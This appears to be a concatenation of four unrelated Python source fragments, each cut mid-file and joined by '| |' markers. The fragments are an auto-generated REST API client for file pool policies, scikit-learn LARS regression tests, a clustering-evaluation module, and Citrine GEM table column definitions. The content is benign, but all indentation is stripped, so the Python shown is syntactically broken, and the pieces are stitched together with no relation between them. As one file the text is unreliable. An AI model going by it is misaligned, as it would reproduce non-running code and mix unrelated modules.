# verify the required parameter 'filepool_policy_id' is set
if ('filepool_policy_id' not in params) or (params['filepool_policy_id'] is None):
raise ValueError("Missing the required parameter `filepool_policy_id` when calling `delete_filepool_policy`")
resource_path = '/platform/1/filepool/policies/{FilepoolPolicyId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_policy_id' in params:
path_params['FilepoolPolicyId'] = params['filepool_policy_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_default_policy(self, **kwargs):
"""
List default file pool policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_default_policy(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: FilepoolDefaultPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_default_policy" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/1/filepool/default-policy'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolDefaultPolicy',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_policy(self, filepool_policy_id, **kwargs):
"""
Retrieve file pool policy information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_policy(filepool_policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_policy_id: Retrieve file pool policy information. (required)
:return: FilepoolPolicies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_policy_id' is set
if ('filepool_policy_id' not in params) or (params['filepool_policy_id'] is None):
raise ValueError("Missing the required parameter `filepool_policy_id` when calling `get_filepool_policy`")
resource_path = '/platform/1/filepool/policies/{FilepoolPolicyId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_policy_id' in params:
path_params['FilepoolPolicyId'] = params['filepool_policy_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolPolicies',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_template(self, filepool_template_id, **kwargs):
"""
Retrieve a file pool template.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_template(filepool_template_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_template_id: The ID of the file pool template to retrieve. (required)
:return: FilepoolTemplates
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_template_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_template_id' is set
if ('filepool_template_id' not in params) or (params['filepool_template_id'] is None):
raise ValueError("Missing the required parameter `filepool_template_id` when calling `get_filepool_template`")
resource_path = '/platform/1/filepool/templates/{FilepoolTemplateId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_template_id' in params:
path_params['FilepoolTemplateId'] = params['filepool_template_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolTemplates',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_templates(self, **kwargs):
"""
List all templates.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_templates(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: FilepoolTemplates
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_templates" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/1/filepool/templates'.replace('{format}', 'json')
path_params = | |
# Create an ill-conditioned situation in which the LARS has to go
# far in the path to converge, and check that LARS and coordinate
# descent give the same answers
# Note it used to be the case that Lars had to use the drop for good
# strategy for this but this is no longer the case with the
# equality_tolerance checks
X = [[1e20, 1e20, 0],
[-1e-32, 0, 0],
[1, 1, 1]]
y = [10, 10, 1]
alpha = .0001
def objective_function(coef):
return (1. / (2. * len(X)) * linalg.norm(y - np.dot(X, coef)) ** 2
+ alpha * linalg.norm(coef, 1))
lars = linear_model.LassoLars(alpha=alpha, normalize=False)
assert_warns(ConvergenceWarning, lars.fit, X, y)
lars_coef_ = lars.coef_
lars_obj = objective_function(lars_coef_)
coord_descent = linear_model.Lasso(alpha=alpha, tol=1e-4, normalize=False)
cd_coef_ = coord_descent.fit(X, y).coef_
cd_obj = objective_function(cd_coef_)
assert_less(lars_obj, cd_obj * (1. + 1e-8))
def test_lars_add_features():
# assure that at least some features get added if necessary
# test for 6d2b4c
# Hilbert matrix
n = 5
H = 1. / (np.arange(1, n + 1) + np.arange(n)[:, np.newaxis])
clf = linear_model.Lars(fit_intercept=False).fit(
H, np.arange(n))
assert np.all(np.isfinite(clf.coef_))
def test_lars_n_nonzero_coefs(verbose=False):
lars = linear_model.Lars(n_nonzero_coefs=6, verbose=verbose)
lars.fit(X, y)
assert_equal(len(lars.coef_.nonzero()[0]), 6)
# The path should be of length 6 + 1 in a Lars going down to 6
# non-zero coefs
assert_equal(len(lars.alphas_), 7)
@ignore_warnings
def test_multitarget():
# Assure that estimators receiving multidimensional y do the right thing
Y = np.vstack([y, y ** 2]).T
n_targets = Y.shape[1]
estimators = [
linear_model.LassoLars(),
linear_model.Lars(),
# regression test for gh-1615
linear_model.LassoLars(fit_intercept=False),
linear_model.Lars(fit_intercept=False),
]
for estimator in estimators:
estimator.fit(X, Y)
Y_pred = estimator.predict(X)
alphas, active, coef, path = (estimator.alphas_, estimator.active_,
estimator.coef_, estimator.coef_path_)
for k in range(n_targets):
estimator.fit(X, Y[:, k])
y_pred = estimator.predict(X)
assert_array_almost_equal(alphas[k], estimator.alphas_)
assert_array_almost_equal(active[k], estimator.active_)
assert_array_almost_equal(coef[k], estimator.coef_)
assert_array_almost_equal(path[k], estimator.coef_path_)
assert_array_almost_equal(Y_pred[:, k], y_pred)
@pytest.mark.filterwarnings('ignore: The default value of cv') # 0.22
def test_lars_cv():
# Test the LassoLarsCV object by checking that the optimal alpha
# increases as the number of samples increases.
# This property is not actually guaranteed in general and is just a
# property of the given dataset, with the given steps chosen.
old_alpha = 0
lars_cv = linear_model.LassoLarsCV()
for length in (400, 200, 100):
X = diabetes.data[:length]
y = diabetes.target[:length]
lars_cv.fit(X, y)
np.testing.assert_array_less(old_alpha, lars_cv.alpha_)
old_alpha = lars_cv.alpha_
assert not hasattr(lars_cv, 'n_nonzero_coefs')
@pytest.mark.filterwarnings('ignore::FutureWarning')
def test_lars_cv_max_iter():
with warnings.catch_warnings(record=True) as w:
rng = np.random.RandomState(42)
x = rng.randn(len(y))
X = diabetes.data
X = np.c_[X, x, x] # add correlated features
lars_cv = linear_model.LassoLarsCV(max_iter=5)
lars_cv.fit(X, y)
assert len(w) == 0
def test_lasso_lars_ic():
# Test the LassoLarsIC object by checking that
# - some good features are selected.
# - alpha_bic > alpha_aic
# - n_nonzero_bic < n_nonzero_aic
lars_bic = linear_model.LassoLarsIC('bic')
lars_aic = linear_model.LassoLarsIC('aic')
rng = np.random.RandomState(42)
X = diabetes.data
X = np.c_[X, rng.randn(X.shape[0], 5)] # add 5 bad features
lars_bic.fit(X, y)
lars_aic.fit(X, y)
nonzero_bic = np.where(lars_bic.coef_)[0]
nonzero_aic = np.where(lars_aic.coef_)[0]
assert_greater(lars_bic.alpha_, lars_aic.alpha_)
assert_less(len(nonzero_bic), len(nonzero_aic))
assert_less(np.max(nonzero_bic), diabetes.data.shape[1])
# test error on unknown IC
lars_broken = linear_model.LassoLarsIC('<unknown>')
assert_raises(ValueError, lars_broken.fit, X, y)
def test_lars_path_readonly_data():
# When using automated memory mapping on large input, the
# fold data is in read-only mode
# This is a non-regression test for:
# https://github.com/scikit-learn/scikit-learn/issues/4597
splitted_data = train_test_split(X, y, random_state=42)
with TempMemmap(splitted_data) as (X_train, X_test, y_train, y_test):
# The following should not fail despite copy=False
_lars_path_residues(X_train, y_train, X_test, y_test, copy=False)
@pytest.mark.filterwarnings('ignore: The default of the `iid`') # 0.22
def test_lars_path_positive_constraint():
# this is the main test for the positive parameter on the lars_path method
# the estimator classes just make use of this function
# we do the test on the diabetes dataset
# ensure that we get negative coefficients when positive=False
# and all positive when positive=True
# for method 'lar' (default) and lasso
# Once deprecation of LAR + positive option is done use these:
# assert_raises(ValueError, linear_model.lars_path, diabetes['data'],
# diabetes['target'], method='lar', positive=True)
with pytest.warns(DeprecationWarning, match='broken'):
linear_model.lars_path(diabetes['data'], diabetes['target'],
return_path=True, method='lar',
positive=True)
method = 'lasso'
_, _, coefs = \
linear_model.lars_path(X, y, return_path=True, method=method,
positive=False)
assert coefs.min() < 0
_, _, coefs = \
linear_model.lars_path(X, y, return_path=True, method=method,
positive=True)
assert coefs.min() >= 0
# now we are going to test the positive option for all estimator classes
default_parameter = {'fit_intercept': False}
estimator_parameter_map = {'LassoLars': {'alpha': 0.1},
'LassoLarsCV': {},
'LassoLarsIC': {}}
@pytest.mark.filterwarnings('ignore: The default value of cv') # 0.22
def test_estimatorclasses_positive_constraint():
# testing the transmissibility for the positive option of all estimator
# classes in this same function here
default_parameter = {'fit_intercept': False}
estimator_parameter_map = {'LassoLars': {'alpha': 0.1},
'LassoLarsCV': {},
'LassoLarsIC': {}}
for estname in estimator_parameter_map:
params = default_parameter.copy()
params.update(estimator_parameter_map[estname])
estimator = getattr(linear_model, estname)(positive=False, **params)
estimator.fit(X, y)
assert estimator.coef_.min() < 0
estimator = getattr(linear_model, estname)(positive=True, **params)
estimator.fit(X, y)
assert min(estimator.coef_) >= 0
def test_lasso_lars_vs_lasso_cd_positive():
# Test that LassoLars and Lasso using coordinate descent give the
# same results when using the positive option
# This test is basically a copy of the above with the additional positive
# option. However, for the middle part, the comparison of coefficient values
# for a range of alphas, we had to make some adaptations. See below.
# not normalized data
X = 3 * diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
positive=True)
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8, positive=True)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
# The range of alphas chosen for coefficient comparison here is restricted
# as compared with the above test without the positive option. This is due
# to the circumstance that the Lars-Lasso algorithm does not converge to
# the least-squares-solution for small alphas, see 'Least Angle Regression'
# by Efron et al 2004. The coefficients are typically in congruence up to
# the smallest alpha reached by the Lars-Lasso algorithm and start to
# diverge thereafter. See
# https://gist.github.com/michigraber/7e7d7c75eca694c7a6ff
for alpha in np.linspace(6e-1, 1 - 1e-2, 20):
clf1 = linear_model.LassoLars(fit_intercept=False, alpha=alpha,
normalize=False, positive=True).fit(X, y)
clf2 = linear_model.Lasso(fit_intercept=False, alpha=alpha, tol=1e-8,
normalize=False, positive=True).fit(X, y)
err = linalg.norm(clf1.coef_ - clf2.coef_)
assert_less(err, 1e-3)
# normalized data
X = diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
positive=True)
lasso_cd = linear_model.Lasso(fit_intercept=False, normalize=True,
tol=1e-8, positive=True)
for c, a in zip(lasso_path.T[:-1], alphas[:-1]): # don't include alpha=0
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_vs_R_implementation():
# Test that sklearn LassoLars implementation agrees with the LassoLars
# implementation available in R (lars library) under the following
# scenarios:
# 1) fit_intercept=False and normalize=False
# 2) fit_intercept=True and normalize=True
# Let's generate the data used in the bug report 7778
y = np.array([-6.45006793, -3.51251449, -8.52445396, 6.12277822,
-19.42109366])
x = np.array([[0.47299829, 0, 0, 0, 0],
[0.08239882, 0.85784863, 0, 0, 0],
[0.30114139, -0.07501577, 0.80895216, 0, 0],
[-0.01460346, -0.1015233, 0.0407278, 0.80338378, 0],
[-0.69363927, 0.06754067, 0.18064514, -0.0803561,
0.40427291]])
X = x.T
###########################################################################
# Scenario 1: Let's compare R vs sklearn when fit_intercept=False and
# normalize=False
###########################################################################
#
# The R result was obtained using the following code:
#
# library(lars)
# model_lasso_lars = lars(X, t(y), type="lasso", intercept=FALSE,
# trace=TRUE, normalize=FALSE)
# r = t(model_lasso_lars$beta)
#
r = np.array([[0, 0, 0, 0, 0, -79.810362809499026, -83.528788732782829,
-83.777653739190711, -83.784156932888934,
-84.033390591756657],
[0, 0, 0, 0, -0.476624256777266, 0, 0, 0, 0,
0.025219751009936],
[0, -3.577397088285891, -4.702795355871871,
-7.016748621359461, -7.614898471899412, -0.336938391359179,
0, 0, 0.001213370600853, 0.048162321585148],
[0, 0, 0, 2.231558436628169, 2.723267514525966,
2.811549786389614, 2.813766976061531, 2.817462468949557,
2.817368178703816, 2.816221090636795],
[0, 0, -1.218422599914637, -3.457726183014808,
-4.021304522060710, -45.827461592423745,
-47.776608869312305,
-47.911561610746404, -47.914845922736234,
-48.039562334265717]])
model_lasso_lars = linear_model.LassoLars(alpha=0, fit_intercept=False,
normalize=False)
model_lasso_lars.fit(X, y)
skl_betas = model_lasso_lars.coef_path_
assert_array_almost_equal(r, skl_betas, decimal=12)
###########################################################################
###########################################################################
# Scenario 2: Let's compare R vs sklearn when fit_intercept=True and
# normalize=True
#
# Note: When normalize is equal to True, R returns the coefficients in
# their original units, that is, they are rescaled back, whereas sklearn
# does not do that, therefore, we need to do this step before comparing
# their results.
###########################################################################
#
# The R result was obtained using the following code:
#
# library(lars)
# model_lasso_lars2 = lars(X, t(y), type="lasso", intercept=TRUE,
# trace=TRUE, normalize=TRUE)
# r2 = t(model_lasso_lars2$beta)
r2 = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 8.371887668009453, 19.463768371044026],
[0, 0, | |
from eagles.Unsupervised.utils import plot_utils as pu
from eagles.Unsupervised.utils import cluster_eval_utils as ceu
from eagles.Unsupervised.utils import logger_utils as lu
import numpy as np
import pandas as pd
from IPython.display import display
from sklearn.cluster import KMeans, AgglomerativeClustering, DBSCAN
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.metrics import silhouette_score
from kneed import KneeLocator
import logging
logger = logging.getLogger(__name__)
pd.set_option("display.max_rows", None)
pd.set_option("display.max_columns", None)
pd.set_option("display.width", None)
pd.set_option("display.max_colwidth", None)
def _find_max_sil(res_dict):
max_ind = res_dict["scores"].argmax()
num_clusters = res_dict["n_clusters"][max_ind]
max_sil_score = res_dict["scores"][max_ind]
return num_clusters, max_sil_score
def _init_method(model=None, params={}):
if model is None:
logger.warning("No model passed in")
return
if model == "kmeans":
mod = KMeans(**params)
elif model == "agglomerativeclustering":
mod = AgglomerativeClustering(**params)
elif model == "dbscan":
mod = DBSCAN(**params)
else:
mod = model
return mod
def find_optimal_clusters(
data=None,
ft_cols=[],
cluster_method="kmeans",
metric="max_sil",
min_num_clusters=2,
max_num_clusters=10,
params={},
scale=None,
plot_dims=[],
summary_stats=[],
run_stat_comps=True,
plot_scale=None,
random_seed=None,
log="log",
log_name=None,
log_path=None,
log_note=None,
):
"""
Takes in data and a model specification and fits the specified unsupervised model to the data. Then uses the
specified metric to find the optimal number of clusters. The optimal number of clusters is passed to
eval_clusters to evaluate the resulting clusters for differences.
:param data: default None, expects pandas dataframe with names columns
:param ft_cols: default empty list: expects list containing string names of the columns to use for clustering.
If default then uses all cols
:param cluster_method: default "kmeans", expects string name of the model to be applied (i.e. kmeans,
agglomerativeclustering, dbscan
:param metric: default "max_sil", expects string for metric to determine the optimal number of clusters
:param min_num_clusters: default 2, int specifying the lower bound of the number of clusters
:param max_num_clusters: default 10, int specifying the upper bound of the number of clusters
:param params: default empty dict, paramter dictionary for the model being tested
:param scale: default None, expects either "minmax", "standard" or sklearn scaler object
:param plot_dims: default empty list, expects list of dimensions to plot the result clusters across
:param summary_stats: default empty list, expects list of grouping statistics to apply to data \
during cluster comparisons
:param run_stat_comps: default True, boolean indicating whether or not to run cluster comparisons
:param plot_scale: default None, expects either "minmax" or "standard" to indicate scaling of features for plots
:param random_seed: default None, int specifying the random seed value for the analysis
:param log: string or list, default "log". Expects either a string ("log", "data", "mod") or a list containing these
keywords to tell the logger what to log. Note that when a list is passed in, the function will create a directory to
store the logged out components.
:param log_name: str default None, prefix name of logged out data. Ignored if log is None
:param log_path: str default None, path to save log data to. Ignored if log is None
:param log_note: str default None, note to be used in the log that is saved out. Ignored if log is None
:return: returns pandas df with attached cluster labels
"""
if min_num_clusters == max_num_clusters:
logger.warning("WARNING MIN AND MAX NUM CLUSTERS SHOULD NOT BE EQUAL")
return
if random_seed is None:
random_seed = np.random.randint(1000, size=1)[0]
print("Random Seed Value: " + str(random_seed))
if len(ft_cols) == 0:
ft_cols = [col for col in data.columns]
data = data[ft_cols].copy(deep=True)
if scale:
if scale == "standard":
scaler = StandardScaler()
data = scaler.fit_transform(data[ft_cols])
elif scale == "minmax":
scaler = MinMaxScaler()
data = scaler.fit_transform(data[ft_cols])
else:
data = scale.fit_transform(data)
data = pd.DataFrame(data)
data.columns = ft_cols
# if kmeans of agglom loop through to find the optimal clusters
if cluster_method in ["kmeans", "agglomerativeclustering"]:
res_dict = {"n_clusters": np.array([]), "scores": np.array([])}
# loop through the number of clusters and create dictionary of num clusters with metrics
for i in range(min_num_clusters, max_num_clusters, 1):
params["n_clusters"] = i
res_dict["n_clusters"] = np.append(res_dict["n_clusters"], i)
model = _init_method(model=cluster_method, params=params)
pred_labels = model.fit_predict(data[ft_cols])
if metric in ["max_sil"]:
res_dict["scores"] = np.append(
res_dict["scores"], silhouette_score(data, pred_labels)
)
elif metric == "knee_wss":
res_dict["scores"] = np.append(res_dict["scores"], model.inertia_)
else:
logger.warning("WARNING METRIC NOT SUPPORTED")
return
print("Finished fitting model with " + str(i) + " clusters", end="\r")
print("", end="\n")
elif cluster_method in ["dbscan"]:
model = _init_method(model=cluster_method, params=params)
model.fit_predict(data[ft_cols])
else:
logger.warning("Non supported model passed in")
return
# Once looped through and found the scores across the range of clusters then get final set based on the best score
if cluster_method in ["kmeans", "agglomerativeclustering"]:
if metric == "max_sil":
opt_n_clusters, max_sil_score = _find_max_sil(res_dict=res_dict)
opt_n_clusters = int(opt_n_clusters)
print("Best silhoutte score: " + str(max_sil_score))
elif metric == "knee_wss":
kn = KneeLocator(
x=res_dict["n_clusters"],
y=res_dict["scores"],
curve="convex",
direction="decreasing",
)
opt_n_clusters = int(kn.knee)
pu.plot_score_curve(data=res_dict, metric=metric, opt_n_clusters=opt_n_clusters)
elif cluster_method in ["dbscan"]:
opt_n_clusters = len(set(model.labels_)) - (1 if -1 in model.labels_ else 0)
print("Optimal number of clusters: " + str(opt_n_clusters) + "\n")
eval_clusters(
data=data,
n_clusters=opt_n_clusters,
method=cluster_method,
params=params,
ft_cols=ft_cols,
plot_dims=plot_dims,
summary_stats=summary_stats,
run_stat_comps=run_stat_comps,
plot_scale=plot_scale,
log=log,
log_name=log_name,
log_path=log_path,
log_note=log_note,
)
return data
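# A minimal usage sketch for find_optimal_clusters, assuming a numeric pandas
# DataFrame `df`; the column names, parameter choices and the decision to disable
# logging are illustrative only.
def _example_find_optimal_clusters(df):
    return find_optimal_clusters(
        data=df,
        ft_cols=["ft1", "ft2", "ft3"],
        cluster_method="kmeans",
        metric="knee_wss",
        min_num_clusters=2,
        max_num_clusters=8,
        scale="standard",
        log=None,
    )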
def eval_clusters(
data=None,
ft_cols=[],
n_clusters=2,
method="kmeans",
params={},
scale=None,
plot_dims=[],
summary_stats=[],
run_stat_comps=True,
plot_scale=None,
log="log",
log_name=None,
log_path=None,
log_note=None,
):
"""
Function to find and compare clusters across specified dimensions
:param data: default None, expects pandas dataframe with names columns
:param ft_cols: default empty list: expects list containing string names of the columns to use for clustering.
:param n_clusters: default 2, int specifying the number of desired clusters
:param method: default "kmeans", expects string name of the model to be applied (i.e. kmeans,
agglomerativeclustering, dbscan
:param params: default empty dict, paramter dictionary for the model being used
:param scale: default None, expects either "minmax", "standard" or sklearn scaler object
:param plot_dims: default empty list, expects list of dimensions to plot the result clusters across
:param summary_stats: default empty list, expects list of grouping statistics to apply to data \
during cluster comparisons
:param run_stat_comps: default True, boolean indicating whether or not to run cluster comparisons
:param plot_scale: default None, expects either "minmax" or "standard" to indicate scaling of features for plots
    :param log: string or list default "log", expects either a string ("log", "data", "mod") or a list containing these
    keywords to tell the logger what to log. Note that when a list is passed in, the function will create a directory to store
    the logged out components.
    :param log_name: str default None, prefix name of logged out data. Ignored if log is None
    :param log_path: str default None, path to save log data to. Ignored if log is None
    :param log_note: str default None, note to be used in the log that is saved out. Ignored if log is None
:return: returns pandas df with attached cluster labels
"""
if len(ft_cols) == 0:
ft_cols = [col for col in data.columns]
data = data[ft_cols].copy(deep=True)
if scale:
if scale == "standard":
scaler = StandardScaler()
data = scaler.fit_transform(data[ft_cols])
elif scale == "minmax":
scaler = MinMaxScaler()
data = scaler.fit_transform(data[ft_cols])
else:
            data = scale.fit_transform(data)
data = pd.DataFrame(data)
data.columns = ft_cols
if (
method in ["kmeans", "agglomerativeclustering"]
and "n_cluster" not in params.keys()
):
params["n_clusters"] = n_clusters
model = _init_method(model=method, params=params)
pred_labels = model.fit_predict(data[ft_cols])
data["Cluster"] = model.labels_
data["Cluster"] = data["Cluster"].astype(str)
    sil_score = silhouette_score(data[ft_cols], pred_labels)
print("Silhouette Score: " + str(round(sil_score, 2)))
if type(model).__name__ == "Pipeline":
if type(model.named_steps["model"]).__name__ == "KMeans":
print(
"WSS Total: "
+ str(round(model.named_steps["model"].inertia_, 2))
+ "\n"
)
elif method == "kmeans":
print("WSS Total: " + str(round(model.inertia_, 2)) + "\n")
if len(plot_dims) == 0:
plot_dims = ft_cols + ["Cluster"]
print("Number of Observations per Cluster")
print(str(data["Cluster"].value_counts()) + "\n\n")
base_cluster_stats = ceu.create_summary_table(
data=data, plot_dims=plot_dims, summary_stats=summary_stats
)
base_cluster_stats = round(base_cluster_stats, 2)
print("Base Cluster Stats \n")
display(base_cluster_stats.T)
print("\n\n")
if run_stat_comps:
sig_test_results, post_hoc_comps = ceu.run_cluster_comps(
data=data, ft_cols=ft_cols
)
if sig_test_results.shape[0] == 0:
print("No significant differences found between clusters")
else:
print("Significance Testing Results \n")
print(str(round(sig_test_results, 2)) + "\n\n")
if post_hoc_comps.shape[0] == 0:
print("No pairwise significant difference")
else:
print("Pairwise Differences \n")
print(str(round(post_hoc_comps, 2)) + "\n\n")
pu.plot_mean_cluster_scores(data=data, plot_scale=plot_scale)
pu.plot_ft_relationships(data=data, plot_dims=plot_dims)
if log:
log_data = {
"n_clusters": n_clusters,
"features": ft_cols,
"Silhouette Score": round(sil_score, 2),
"data": data,
"params": model.get_params(),
"base_cluster_stats": round(base_cluster_stats, 2),
}
if type(model).__name__ == "Pipeline":
log_data["method"] = type(model).__name__
pipe_steps = "Pipe steps: "
for k in model.named_steps.keys():
pipe_steps = pipe_steps + type(model.named_steps[k]).__name__ + " "
log_data["pipe_steps"] = pipe_steps
else:
log_data["method"] = type(model).__name__
if type(model).__name__ == "Pipeline":
if type(model.named_steps["model"]).__name__ == "KMeans":
log_data["WSS"] = round(model.named_steps["model"].inertia_, 2)
elif | |
"""Column definitions for GEM Tables."""
from typing import Type, Optional, List, Union
from abc import abstractmethod
from gemd.enumeration.base_enumeration import BaseEnumeration
from citrine._serialization.serializable import Serializable
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization import properties
from citrine.gemtables.variables import Variable
class CompositionSortOrder(BaseEnumeration):
"""[ALPHA] Order to use when sorting the components in a composition.
* ``ALPHABETICAL`` is alpha-numeric order by the component name
* ``QUANTITY`` is ordered from the largest to smallest quantity, with ties
broken alphabetically
"""
ALPHABETICAL = "alphabetical"
QUANTITY = "quantity"
class ChemicalDisplayFormat(BaseEnumeration):
"""[ALPHA] Format to use when rendering a molecular structure.
* ``SMILES`` Simplified molecular-input line-entry system
* ``INCHI`` International Chemical Identifier
"""
SMILES = "smiles"
INCHI = "inchi"
def _make_data_source(variable_rep: Union[str, Variable]) -> str:
"""Return a string appropriate to use as a data_source.
Parameters
----------
variable_rep: Union[str, Variable]
Either the name of the variable or the variable itself
"""
if isinstance(variable_rep, str):
return variable_rep
elif isinstance(variable_rep, Variable):
return variable_rep.name
else:
raise TypeError("Columns can only be linked by str or Variable."
"Instead got {}.".format(variable_rep))
class Column(PolymorphicSerializable['Column']):
"""[ALPHA] A column in the GEM Table, defined as some operation on a variable.
Abstract type that returns the proper type given a serialized dict.
"""
@abstractmethod
def _attrs(self) -> List[str]:
pass # pragma: no cover
def __eq__(self, other):
try:
return all([
self.__getattribute__(key) == other.__getattribute__(key) for key in self._attrs()
])
except AttributeError:
return False
@classmethod
def get_type(cls, data) -> Type[Serializable]:
"""Return the subtype."""
if "type" not in data:
raise ValueError("Can only get types from dicts with a 'type' key")
types: List[Type[Serializable]] = [
IdentityColumn,
MeanColumn, StdDevColumn, QuantileColumn, OriginalUnitsColumn,
MostLikelyCategoryColumn, MostLikelyProbabilityColumn,
FlatCompositionColumn, ComponentQuantityColumn,
NthBiggestComponentNameColumn, NthBiggestComponentQuantityColumn,
MolecularStructureColumn, ConcatColumn
]
res = next((x for x in types if x.typ == data["type"]), None)
if res is None:
raise ValueError("Unrecognized type: {}".format(data["type"]))
return res
class MeanColumn(Serializable['MeanColumn'], Column):
"""[ALPHA] Column containing the mean of a real-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="mean_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.target_units = target_units
class StdDevColumn(Serializable["StdDevColumn"], Column):
"""[ALPHA] Column containing the standard deviation of a real-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="std_dev_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.target_units = target_units
class QuantileColumn(Serializable["QuantileColumn"], Column):
"""[ALPHA] Column containing a quantile of the variable.
The column is populated with the quantile function of the distribution evaluated at "quantile".
For example, for a uniform distribution parameterized by a lower and upper bound, the value
in the column would be:
.. math::
lower + (upper - lower) * quantile
while for a normal distribution parameterized by a mean and stddev, the value would be:
.. math::
mean + stddev * \\sqrt{2} * erf^{-1}(2 * quantile - 1)
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
quantile: float
the quantile to use for the column, defined between 0.0 and 1.0
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
quantile = properties.Float("quantile")
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="quantile_column", deserializable=False)
def _attrs(self) -> List[str]:
